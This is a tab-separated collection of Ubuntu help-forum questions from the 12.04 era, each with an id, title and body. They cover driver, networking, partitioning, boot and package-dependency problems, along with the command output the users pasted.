169275	no wireless on thinkpad t41 with ubuntu 12	i just installed ubuntu 12 on my old thinkpad t41 . i 've done this once before but back then i installed ubuntu 11 first and upgraded to 12 . this time i '' ve used the mini iso file . before the wireless worked perfectly without any tweaks , but now , it 's checked off as enabled in the notification area , but i ca n't see any wireless networks . if i do nm-tool i can see that for the device wlan0 , the driver ath5k is used , but it has state : unmanaged .
169281	modify start up to boot into cli	initially i had the gnome desktop installed and found the graphics card could not support it . i uninstalled the desktop . now it boots into x graphics mode . how do i make it to boot into cli mode ?
169282	how to manage `` unity webapps chromium extension '' different options ?	i have installed the webapps preview from the dedicated ppa , and more or less things are working for a site ( google reader ) that i have accepted to install . i 'm using only google chromium and firefox is not installed . my question is how can i manage the other options ? i mean , when a site is compatible , a banner with this phrase is displayed : for easier access to gmail and extra features , you can install it as a separate application that does n't need a web browser . would you like to install it now ? [ never for this site ] [ yes ] i have three options : press the button `` never for this site '' or the button `` yes '' , or renounce and simply close the banner . if i choose `` yes '' i see that the webapp is installed . ok if i choose `` never for this site '' , and after i changed my mind , how can i `` restore '' the banner ? if i choose `` yes '' , and after i changed my mind , how can i completely uninstall the webapp , and `` restore '' the banner ?
169283	how to upgrade from 9.04 to 12.04 lts ?	please guide me in upgrading from 9.04 to 12.04 lts . also i need guidance in web development , which combination is the best ? lamp ? if so , how do i set up a server ?
169284	ubuntu 12.04 nvida 550ti drivers	i ca n't seem to locate any working drivers for the 550ti . i have downloaded the file from nvidias site and run it , but it just does n't seem to help . i am still unable to increase the resolution , however after running this i am able to boot with the graphics card , without the driver from nvidia it just displays a purple screen when trying to boot . does anyone know how i can get this card working properly ? update : ok , so i have managed to install with nomodeset with the graphics card installed , however i am now having an issue with increasing the resolution , please see the below information : pastebin.com/lrh2jm6c pastebin.com/tscciybw does anyone have any ideas why my resolution is restricted ?
169285	unity lens to search for tags	i want to develop a dash lens to search files by tags ( the ones that are set through nautilus ) . i know on the one hand this program , that does the search : http : //manpages.ubuntu.com/manpages/natty/man1/tracker-tag.1.html but , other than that , i do n't know where to start . where can i learn how to do it ? i have a good knowledge of c/c++ and linux/posix , but i never developed for a graphical interface and less than anything for unity . i also would want an opinion about the `` tags '' option in nautilus , is it there to stay ? i would n't want to develop something that is doomed next version . and finally , if i get it to work , how can i make it public for others to use it ?
169286	is it needed to set static ip and port to get best performance from transmission ?	i 've recently migrated to linux from windows and i work on ubuntu 12.04 lts . i am trying to preserve my usual habits of windows so that i can use linux more regularly . one of those habits is p2p activity . on windows , to get the best of my p2p client ( utorrent ) , i was proceeding as follows : set a static ip to my system and forward a port do i need to do the same to make transmission work at its full capacity ? if yes , how to set a static ip in ubuntu ? ( hope , its not too complicated for a novice like me ) i can manage with forwarding a port unless its a specific process for linux .
169292	why are embedded flash videos ( like youtube ) so heavy on the gpu ?	i have noticed ( in psensor , and listening to the fan ) that my gpu is terribly hot when playing youtube videos . what happens at that point ? is this related to flash in ubuntu ? youtube in firefox and chrome seems to take much more gpu resources than playing the same video or one with a higher resolution from the hard disk , or than playing it from youtube through smplayer ( or vlc ) . related question here .
169302	how to install the most stable & latest nvidia driver in 12.04 ?	i have recently installed ubuntu 12.04 alongside windows 7 . after completing the software update process , i thought that my nvidia drivers also would have been updated , but after restarting the system and checking the version , it still was showing as version 173.14.35 . i have nvidia geforce 7025 / 630a integrated in my asus motherboard can someone tell me how can i update my drivers with the most latest and stable release ? also when searching a lot i went through couple of pages which showed something like ppa . can someone please explain me what is a ppa ?
169306	how to install ×32\86 using windows installer	when i install ubuntu using windows installer it can install only ×64.how can i install ×32\86 using windows installer ?
169310	pressing super key always shows shortcut keys	when i simply press ( not hold ) super i always see the shortcuts list . and after i release the button it stays on my screen . normally pressing super leads to dash opening and to view the shortcuts list i need to hold super . so to open the dash i need press super twice . i have thinkpad t520i . i tried to disable shortcut list , but it did n't solve the problem .
169311	how do i install additional drivers for the intel hd3000 graphics card ?	i have a samsung notebook with intel hd3000 graphics . i have been playing with ubuntu , messing it up and then reinstalling from scratch . but i still ca n't get unity 3d to work . at one point i think i saw a lot of `` additional drivers '' available but now i have none . how do i get the additional drivers for the hd3000 to make unity work ?
169313	wired connection : device not ready/cable unplugged	i used to have windows xp in my pc but it was getting slow , so i completely formatted my computer ( except for the partition with my files ) and installed ubuntu 12.04 . ( i 'm typing this on another pc ) when i start up my pc , on the top right corner , it says `` not connected '' i have an ethernet adapter on my pc and it 's plugged into an ethernet switch , which is plugged into the router . the switch 's lights light up , indicating that the computer is connected to it . since the switch is connected to the router , the router has only one light on . when i right-click the network connections thing , it says wired network device not ready . if i go to `` system settings '' and click on network , under wired , it says `` wired : cable unplugged . hardware address : 94 : oc:6d:85 : c8 : b8 '' it is plugged in , though . this is what i get if i 'ifconfig' janith @ ubuntu-desktop : ~ $ ifconfig eth0 link encap : ethernet hwaddr 94:0c:6d:85 : c8 : b8 inet addr : fe80 : :960c : :6dff : fe85 : :c8b8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:775 errors:0 dropped:0 overruns:0 frame:0 tx packets:40 errors : 0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:99977 ( 99.9kb ) tx bytes:7125 ( 7.1kb ) interrupt:18 base address:0xbc00 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2840 errors:0 dropped:0 overruns:0 frame:0 tx packets:2840 errors : 0 dropped:0 overruns:0 carrier:0 collisions:0 txqueulen:0 rx bytes:231848 ( 231.8kb ) tx bytes:231848 ( 231.8kb ) janith @ ubuntu-desktop : - $ and lspci janith @ ubuntu-desktop : ~ $ lspci 00:00.0 host bridge : intel corporation 82915g/p/gv/gl/pl/910gl memory controller hub ( rev 04 ) 00:01.0 pci bridge : intel corporation 82915g/p/gv/gl/pl/910gl pci express root port ( rev 04 ) 00:02.0 vga compatible controller : intel corporation 82915g/gv/910gl integrated graphics controller ( rev 04 ) 00:1b.0 audio device : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 3 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 4 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 4 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb2 ehci controller ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev d3 ) 00:1f.0 isa bridge : intel corporation 82801fb/fr ( ich6/ich6r ) lpc interface bridge ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) ide controller ( rev 03 ) 00:1f.2 ide interface : intel corporation 82801fb/fw ( ich6/ich6w ) sata controller ( rev 03 ) 00:1f.3 smbus : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) smbus controller ( rev 03 ) 06:01.0 modem : motorola sm56 data fax modem ( rev 04 ) 06:02.0 ethernet controller : sundance technology inc / ic plus corp ic plus ip100a integrated 10/100 ethernet mac + phy ( rev 31 ) janith @ ubuntu-desktop : ~ $ i know my adapter is a tp link , and the windows installation disk says : tm-ip5600 . help ? if i need to install the driver , where do i get it ? thanks .
169314	default permissions for /opt directory ?	during the copying of certain program folders to my /opt directory i mistakenly changed the permissions of the /opt directory . at the moment i ( current user ) can simply write/copy files to the /opt folder without appending sudo . i need instructions to revert it back to the default as i 've got some really important programs in that folder and google chrome has stopped working since that error occurred .
169318	how can i watch the nbc olympics 2012 ( usa ) ?	i can not log in to the nbcolympics.com ( usa ) site on ubuntu . ( i have tried on two computers , with chromium and firefox on each . ) i choose `` click here to get started '' , then the site asks for my cable provider . i choose it , enter my password , and it appears to accept it . the next screen that loads again says `` click here to get started '' . if i click it and choose my provider , it does n't even ask for my password , it just says signing in and the process repeats . a couple of points : it works fine on windows xp . if i purposely enter a wrong password , it tells me so . this error only occurs if i have the password correct . has anyone been able to make it work ?
169320	.run file is not working . i double click and get : could not display , file is of unknown type	so , the only thing i can think of is that ubuntu did not correctly install some software as it does n't recognize .run files . i checked `` allow to run as executable file '' , but nothing .
169323	how can i connect ekiga to other voip services ?	i am using ubuntu 12.04 . ekiga does not work properly because i ca n't add other sip services like ( poivy , voip stunt etc . ) i really need these voip services desperately . can anyone give me an alternative ( not skype ) or a solution ?
169324	how do i delete a webapp created using unity webapp ?	i created some webapps ( like linkedin for example ) using the integration into ubuntu called unity webapps . i now want to delete some . how should i delete specific webapps ?
169325	slow wireless on dell xps 14 ultrabook	i 've got ubuntu 12.04 running on this dell xps 14 ultrabook ( l421x ) . everything is working but my wireless transfer rates are low . i 'm getting about 1mb/s download speed on the ultrabook vs 15mb/s on the e6500 . if i move into the room with the access point the speed climbs to 15mb/s so i 'm guessing it is a signal strength issue but wavemon shows comparable signals to those seen by the e6500 . are there any settings i can tweak in hopes of making it faster ?
169326	i do n't know what to do next after i installed ubuntu using vmware . it goes to a blank screen	i just installed ubuntu using vmware player . after i installed it , it goes to a blank screen and asked for my username and password . i typed it in then is says : welcome to ubuntu 12.04 lts ( gnu/linux 3.2.0-23-generic-pae i686 ) *documentation : https : //help.ubuntu.com/ 329 packages can be updated . 73 updates are security updates . mumsawitch @ ubuntu : ~ $ i do n't know what to type in next . i tried inputting `` yes '' but it hanged ( or at least i think it did ) and started displaying a lot of letter ys . ugh . i 'm getting frustrated . what should i do
169328	dual display in ubuntu	i am running ubuntu 12.04 lts . i am running it on a compaq presario cq42-291tx . i have an additional monitor from my previous desktop pc . problem arise when i have to work and my friends wants to watch movies . i know that i can connect my monitor with my laptop . i saw it in windows , and it works here fine . is it possible to assign a player to play movie file on an external desktop monitor while i am working with another application on my laptop monitor ?
169332	how do i compile sndpeek on the latest ubuntu ?	what do i sudo apt-get as prerequisite to be able to make install sndpeek . also , there are three options , make linux-alsa , make linux-oss , and make linux-jack . which is appropriate to current out-of-the-box ubuntu ?
169335	ubuntu partition permissions	i have just one partition with all my data on it . i want to change it 's permission to allow any user to change , create and delete files and to be able to do that through livecd . also even after formatting the file system of the partition , i still want to be able to use my files after installing another system . i tried to change permissions by running nautilus as root but after logging in to the livecd , i still found my files locked .
169336	where can i get a list of .deb packages on the alternate cd ?	i 'd like to install ubuntu in my computer . i learned that if i install an alternate version , i can choose the .deb packages i need . but when i log in the system , i always face the problem that there are some packages i should have installed which i have not . i tried a desktop version , and it ran well . so it must be that i made some mistakes when installed it . so where can i get a list of .deb packages , and what are these .debs used for ?
169337	how do i run ubuntu 12.04 arm supported edition on oracle virtual box on windows	i have downloaded the compressed preinstalled image from https : //wiki.ubuntu.com/arm/omapdesktopinstall the file downloaded was ubuntu-12.04-preinstalled-desktop-armhf+omap.img.gz its a compressed gz file and i wanted to know is it straightaway bootable like any other ubuntu iso in virtual box . my host system is windows server 2008 .
169349	how to fix `` could n't connect to host '' error installing unity webapps ?	i get the following errors when i try to install unity webapp on ubuntu 12.04 : root @ detro-x101h : /home/detro # sudo add-apt-repository ppa : webapps/preview traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 7 , `` could n't connect to host '' ) my internet connection seems to be working fine otherwise . i think i am using a proxy server . when i run apt-get update as root , i get these error messages ( full output here ) : w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey f1773af13b1510fd w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 8cd60ec948894010 w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 6a45934ea9d4c08b w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey c2518248eea14886 w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 32b18a1260d8da0b w : gpg error : https : //private-ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey e131728675254d99 w : failed to fetch http : //ppa.launchpad.net/launchpad.net/~scopes-packagers/ubuntu/dists/precise/main/source/sources 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . here 's the ouput of cat /etc/apt/sources.list ; for x in /etc/apt/sources.list.d/* ; do echo ; echo ; echo `` ** $ x : '' ; echo ; cat $ x ; done ( which lists all enabled software sources ) . i 'm new to linux , and i will provided more details as needed .
169350	ubuntu distribution upgrade to 12.04 freezes on configuring lswh	for the last few hours , my upgrade window to 12.04 has been stalled at configuring lswh . the top of the terminal window says irqbalance start/running there 's a fairly long line of errors in the terminal like error can not seek /dev/sdc , most of them coming after the `` generating grub.cfg '' . a the very bottom of the terminal it says found ubuntu 8.04.2 on /dev/sdb3 and then `` done '' on the final line . reading other threads on freezes during upgrade1 gives me some hope i can open another terminal window and fix this and continue with the upgrade , but i have n't found what that command might be . i found some leads here where lshw hangs : bugs.launchpad.net/ubuntu/+source/lshw/+bug/218864 but the solution assumes i can just run a patch , which i ca n't don in the middle of an upgrade . these two issues : http : //eyemeansit.wordpress.com/2010/08/13/generating-grub-cfg-wont-finish/ and https : //answers.launchpad.net/ubuntu/+source/apt/+question/194988 seem to suggestion killing or disabling the os-prober , but i 'm not sure if i can do that mid-upgrade . any suggestions for fixing this ?
169353	kubuntu 12.04 : get rid of default background between login and desktop ready	i installed kubuntu 12.04 from scratch and i have successfully changed the login background and used the same pictures for my desktop background . i have 4 screens and for each screen i use a part of a big image ( readable for everyone ) so that my desktop background appears to be one large image . however , when starting up and after having completed the login screen , the system shows the ( ugly ) default background while loading everything and only at the end my desktop background appears . can i change the background that is shown while kubuntu loads ? i have thought of replacing background.png in /usr/share/kde4/apps/ksplash/themes/default/ but this is only one file and since i use 4 different images , i do n't think this will work . where would i have to look to get rid of the default background ? thanks -=wim=-
169356	question about my usb wirless network adapter	i have a d-link dwa-140 usb network adapter as my network card is knackered so i removed it . i have ubuntu 12.04 installed and for some reason my internet is awfully slow when surfing , downloading ubuntu updates and downloading software in the software center but torrents download fast as anything , does anyone have any idea why this is happening ? pc specs : - 2.5ghz core2quad q8600 or q8300 ( do n't remember which it is ) - 4gb ram - nvidia gtx 560ti hey bruno thanks for the help your are offering and im sorry for posting this as an answer again but honestly there is no add comment link on my screen anywhere all i see is share edit and feedback was this helpful yess or no . so rather than destroy this question post anymore im just going to give up with linux lol . p.s there are no torrents running and the internet is still slow for browsing etc ummmmm the only place i can see add comment is under my own answer which is strange as hell
169357	unable to install skype ( `` unmet dependencies '' error )	trying to install skype on ubuntu 12 , i faced and issue . when i type : sudo apt-get update sudo apt-get install skype i get an error reading package lists ... done building dependency tree reading state information ... done skype is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : skype : depends : lib32stdc++6 ( > = 4.1.1-21 ) but it is not going to be installed depends : lib32asound2 ( > 1.0.14 ) but it is not going to be installed depends : ia32-libs but it is not going to be installed depends : libc6-i386 ( > = 2.7-1 ) but it is not going to be installed depends : lib32gcc1 ( > = 1:4.1.1-21+ia32.libs.1.19 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . how do i solve it ? is the way i 'm using the right one to install skype ? update : if i try to do sudo apt-get install lib32stdc++6 lib32asound2 ia32-libs libc6-i386 lib32gcc1 skype then i get reading package lists ... done building dependency tree reading state information ... done skype is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch lib32asound2 : depends : libasound2 ( = 1.0.25-1ubuntu10 ) e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
169363	setting up external hdd to be accessable from android device	i am a brand new ubuntu user on 12.04 and am trying to figure out how to set it up so that i can access my external from my android device from any location . i use the external for all my media and would like to be able to either stream or download to my android no matter where the location . keep in mind that i am completely new to linux and ubuntu , but at the same time computer know-how is n't a problem .
169367	how to fix add-apt-repository `` could n't connect to host '' error ?	i ran apt-get purge . since then , when i want to add a repository , i get an error . sometimes ubuntu shows an error and says that add-apt-repository has closed unexpectedly . this error appears when in the terminal : $ sudo add-apt-repository ppa : bumblebee/stable traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 7 , `` could n't connect to host '' ) i 'm using ubuntu 12.04 lts .
169368	trying to move/merge ext4 partitions with win7 partition intact	so i am using a bootable usb with 12.04 on it to run gparted . what i would like to do is keep the win7 partition and merge/redo the other partitions for ubuntu use . i am not quite sure what the best route to take would be . i do n't mind reinstalling ubuntu if needed . i really just want the 15.42gb unallocated to be usable by ubuntu for saving files . well since i ca n't post a picture it will probably be impossible to answer ... . here are the partitions in order from left to right in gparted . unallocated 64mb sda2 ext4 10gb sda3 ntfs 121gb unallocated 15.42gb sda1 extended 2.5gb sda5 linux-swap 2.5gb here is the fdisk results from the drive . disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x90000000 device boot start end blocks id system /dev/sda1 307337214 312580095 2621441 5 extended /dev/sda2 129024 21100543 10485760 83 linux /dev/sda3 * 21100544 275006793 126953125 7 hpfs/ntfs/exfat /dev/sda5 307337216 312580095 2621440 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 1999 mb , 1999568384 bytes 62 heads , 62 sectors/track , 1015 cylinders , total 3905407 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00018276 device boot start end blocks id system /dev/sdb1 * 62 3901659 1950799 c w95 fat32 ( lba ) disk /dev/sdc : 64 mb , 64487424 bytes 2 heads , 62 sectors/track , 1015 cylinders , total 125952 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6f20736b this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdc1 ? 778135908 1919645538 570754815+ 72 unknown /dev/sdc2 ? 168689522 2104717761 968014120 65 novell netware 386 /dev/sdc3 ? 1869881465 3805909656 968014096 79 unknown /dev/sdc4 ? 2885681152 2885736650 27749+ d unknown here is the fstab file # /etc/fstab : static file system information . use 'blkid -o value -s uuid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . # proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda2 / ext4 errors=remount-ro 0 1 uuid=777828dd-00e5-4efe-a616-3e70949d6559 none swap sw 0 0 current free-m total used free shared buffers cached mem : 1885 1268 616 0 152 769 -/+ buffers/cache : 346 1538 swap : 2499 0 2499
169372	disable blinking wifi led	i 'm trying to disable the blinking wifi on my hp elitebook 8530w ( intel wifi 5300 ) . i 've read some articles on the internet and also this question , and they all come to the same solution : add a wlan.conf or iwglan.con , with options iwlcore led_mode=1 as content in /etc/modprobe.d , and the problem is gone . unfortunately , this does n't work for me , i 've tried restarting every time i changed these files , but it still keeps blinking .
169376	clock time is off on dual boot	dual boot system windows xp pro and ubuntu 12.04 . i have the bios set for the correct time and ubuntu set for us eastern time . ubuntu will boot up and the time will be off by -4 hours . if i correct the time in ubuntu then when i boot up in windows xp the time will be off by + 4 hours . this is a fresh install of 12.04 . i did not have this problem before reinstalling ubuntu .
169383	is windows 7 style access to grouped windows possible in ubuntu 12.04 unity 2d ?	selecting grouped windows with a mouse is highly inconvenient . let 's say i have two firefox windows open and i want to select one of the two with a mouse . i have to click on the firefox launcher then possibly move the mouse across the screen by a distance , depending on how many instances are open and which one i want to access , then click on that . in windows 7 , thumbnail views of the open windows are shown right next to the launcher , which is way more convenient . i am even fine with if only some text , instead of thumbnails , are displayed next to the launcher .
169387	wubildr.mbr error	my computer runs vista home basic . i installed ubuntu on a usb stick using the pendrive linux installer at their website . it installed successfully , but whenever i reboot the computer to switch to ubuntu , i get the following error message : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc000000e info : the selected entry could not be loaded because the application is missing or corrupt .
169391	how can i restore default grub looks ?	recently i 'm installed ubuntu 12.04 . when i boot i have the option to boot two systems : windows 7 and ubuntu . after installing ubuntu connecting net then its show new updates . i updated ubuntu . then after updating my pc asked to restart . i restarted the pc , but now in grub 's background changed , it shows something about dedian universal operating system displayed and one globe symbol wallpaper is displayed . how to change that wallpaper into default ubuntu wallpaper ?
169392	how to install a `` fix released '' package for a bug	so , it seems that on my ubuntu 12.04 11.04 i 'm affected by bug # 971876 . luckily enough , the bug is marked as `` fix released '' and a last comment by the launchpad janitor says that `` this bug was fixed in the package udisks - 1.0.4-5ubuntu2 '' . how do i install the version 1.0.4-5ubuntu2 in order to solve the problem ? i have tried heading to ubuntu packages search , then downloading the .deb and trying to install it manually . unfortunately i have an unmet dependency on the version of libc6 . what is the cleanest way to install it on my 12.04 11.04 ? is this what a backport would be for ? how can i find it or make it ? i am a bit afraid of manually overriding the version of libc6 and installing a newer one , i would n't want to end up breaking the system . update : my mistake : the computer i am talking about is not running 12.04 but 11.04 .
169393	comprehensive synchronization - backup system	does somebody know a synchronization system with file version control ? i have about 3-5 gb of data which i want to synchronize with another storage ( directory ) . both directory should store the last versions of files . so if any changes occur in one directory , they must be reflected into another one and vice verse . also all changes ( not matter how large they were : remove of 1gb file or a simple text line addition ) should be stored . of course , rollback should be available . to make a certain notion of what i am talking about here it is some examples . dropbox - system make a synchronization of local storage and remote . it has a backup and version control feature . very good system i like it , i use it , but it only works for local directory and for remote dropbox storage . however i need to use it for local data and more flexible job configuration . vsc ( mercurial , git , svn , ... . ) - synchronization of repositories of text files . very comprehensive systems , i use them for my documents , there were no occurrences when i could not find something in their capabilities ever . but how i have said it is only for text files .
169400	python ctypes and pulseaudio segfault after upgrade to 12.04	today i finally took the plunge and upgraded my desktop machine from 11.10 to 12.04 using the upgrade process , not a fresh install . one of the first things i tested after the upgrade completed was a little python library i have that plays sound through pulseaudio , basically a python 2.x port of the answer to http : //askubuntu.com/a/33602/55992 this code now segfaults at the final line , whereas it did n't before the upgrade : import ctypes import struct pa_sample_float32le = 5 pa_stream_playback = 1 pa = ctypes.cdll.loadlibrary ( `` libpulse-simple.so.0 '' ) pa.pa_strerror.restype = ctypes.c_char_p pat_sample_spec = ctypes.c_buffer ( struct.pack ( `` =llb '' , pa_sample_float32le , 44100 , 2 ) ) error = ctypes.c_int ( 0 ) s = pa.pa_simple_new ( 0 , `` python '' , pa_stream_playback , 0 , `` test '' , ctypes.byref ( pat_sample_spec ) , 0 , 0 , ctypes.byref ( error ) ) what is weird is that this same code works on a laptop i have that i did a fresh install of 12.04 on a couple months ago . i am running python 2.7.3 on both systems . any ideas on what is broken ? does it work for others ? edit : i should note that i can get this to limp along by messing around with it a bit , e.g . once just by adding a few print lines for debugging before the pa_simple_new call i was able to avoid a segfault and everything worked properly , but this solution seems hacky and unstable , something is wrong here . edit2 : here is the backtrace ( hope i am doing this right , i am not experienced with gdb ) : # 0 0x00007ffff5d7ba69 in pa_channel_map_valid ( ) from /usr/lib/x86_64-linux-gnu/libpulse.so.0 # 1 0x00007ffff5fb99a7 in pa_simple_new ( ) from /usr/lib/x86_64-linux-gnu/libpulse-simple.so.0 # 2 0x00007ffff61d6ea4 in ffi_call_unix64 ( ) from /usr/lib/python2.7/lib-dynload/_ctypes.so # 3 0x00007ffff61d68c5 in ffi_call ( ) from /usr/lib/python2.7/lib-dynload/_ctypes.so # 4 0x00007ffff61c72c2 in _ctypes_callproc ( ) from /usr/lib/python2.7/lib-dynload/_ctypes.so # 5 0x00007ffff61c7aa2 in ? ? ( ) from /usr/lib/python2.7/lib-dynload/_ctypes.so # 6 0x00000000004c7c76 in pyobject_call ( ) # 7 0x000000000042aa4a in pyeval_evalframeex ( ) # 8 0x00000000004317f2 in pyeval_evalcodeex ( ) # 9 0x000000000054b171 in pyrun_fileexflags ( ) # 10 0x000000000054b7d8 in pyrun_simplefileexflags ( ) # 11 0x000000000054c5d6 in py_main ( ) # 12 0x00007ffff68e576d in __libc_start_main ( ) from /lib/x86_64-linux-gnu/libc.so.6 # 13 0x000000000041b931 in _start ( ) edit3 : running the same script on my laptop ( where there is no segfault ) the only difference is that frame 2 is instead ffi_call_sysv ( ) and then we go into 32-bit versions of pulseaudio . i would be surprised if 32 vs 64 bit is the issue though , this code worked just fine on this same machine before the upgrade to 12.04 .
169409	lost control of root account , ubuntu server 11.10	after i created a group , and put the root account in it , i lost control of it and now it 's not root anymore . also i ca n't login with `` root '' . how can i revert this ? now there is no way i can use sudo commands . and i do n't know what account the control has ! /etc/group looks like this : root : x:0 ... developers : x:1004 : thomas , website
169412	when i cancelled upgrade to 12.04 , i could n't update gain	when i was updating from 11.10 , to 12.04 , i cancelled because the computer froze . now the update manager does n't show an upgrade option . how do i upgrade ? it said i could continue through a location i can not remember . and it downloaded some files already . is their some command lne thingy or a location to continue the proccess ?
169416	ubuntu swap partition missing in windows 8	i just installed ubuntu as my first linux experience . i 've did some research beforehand , and read about swap memory increasing performance . i have data parition ( d : / ) where i keep all my data , and that one also had the most free space . so i selected that one . i did not select the format option . i 'm currently on windows 7 , and i can only see my c : / partition , which has windows stored on it . did i just erased all the data on my d : / paritition ? : ( i ca n't check on ubuntu if the data is there because ubuntu is missing from the boot options . i actually have no idea how to get in there .
169417	mounting iso images to play on wine	i would very much like to be able to mount iso images on my file system while getting wine to detect them as if they were real cd/dvd images inside the cd/dvd drive . as of this day i have n't been able to do it with furious iso mount or gmountiso . this is an issue when trying to play a game on wine : i can mount an image and install the game perfectly , but when it comes to play the game i get the `` please insert your cdrom '' message . perhaps i 'm misunderstanding something about mounting ; on windows , i used daemon tools just fine . any clues ?
169426	how to get cursor click effect ?	i 've seen videos like this one in which a effect appears when the user made a click . what i want it 's just the effect only , i do n't care the colour of the cursor . how can i make this effect when i do a click in ubuntu 11.10 ?
169437	how to start thunderbird minimized on start-up ?	i followed this tutorial to set start thunderbird in minimized mode at startup , but it was n't helpful . after following the instructions , i could not even start thunderbird . so i was forced to start tb in safe mode to delete the `` firetray plugin '' and fix this issue . after that it started to work but it deleted all my email accounts and i had to do that chore all over again . so is there any working way to start thunderbird minimized on start-up ?
169439	how to download and re-install a folder or file using ubuntu one	i recently had trouble with thunderbird reading my start up files and could not figure how to download the folder from my ubuntu one site . i was afraid that if i just let it sinc it would overwrite the one on ubuntu one that i knew was a good one . i ca n't figure out how to download a file or a folder . thanks for any help in advace . b
169440	distorted graphics problem	my laptop is asus n53s . i 'm using ubuntu 12.04 lts . installed bumblebee to use nvidia optimus ( nvidia geforce gt540m ) - animations , performance in games are excellent . but sometimes when i 'm working with some programs i 'm getting distorted display . please look at screenshots :
169444	using quickly to develop apps for raspberry pi ?	can raspberry pi apps be developed with quickly on ubuntu ? i know there is n't ubuntu for the pi yet but what i want to do is develop the app on my ubuntu machine , compile it and copy the deb file to the pi . then install and run it . will this work ? it will be much easier to make the apps i need to make to with quickly . i assume i will have to use something other than ubuntu-application when creating the app .
169446	ca n't mount drive in 12.04	i am currently getting the message : unable to mount `` data '' error mounting : mount exited with exit code 13 : $ mftmirr does not match $ mft ( record 3 ) .failed to mount '/dev/sdb6 ' : input/output error i 'm running ubuntu 12.04 dual booted with win 7 . the ubuntu os is on one of two partitions on one hdd , the other partition being ntfs labelled `` data '' . this message is recently occurring despite the fact that ubuntu previously read this partition and win 7 still reads it . i have reinstalled ubuntu but no change . i 've tried various workarounds gleaned from the forums , but no luck . obviously i 'm not experienced enough to work it out for myself . your help will be appreciated .
169447	ca n't boot after install , pxe-e61 error on a lenovo z570	i am so stumped and 2 days into trying get ubuntu on this machine , lenovo z570 . initially installed 32-bit 12.04 and it worked fine except it only acknowledged 2.9gb ram ( should be 8ng ) , which is when i learned that i was supposed to have installed the 64-bit version . did so , ca n't boot up . error is pxe-e61 media test failed , check cable ( booting from hd as it should be ) . `` boot-repair '' ( installed under live usb ) hangs on scanning , never completes . if i close it manually a few screens come up and i can try the recommended repairs but no fix . it looks like there was a bios update for this machine but it is only for windows and that has been gone since first ubuntu install . i have tried reinstalling 32-bit , it does work , so have ruled out a cable actually being unplugged . what should i do ?
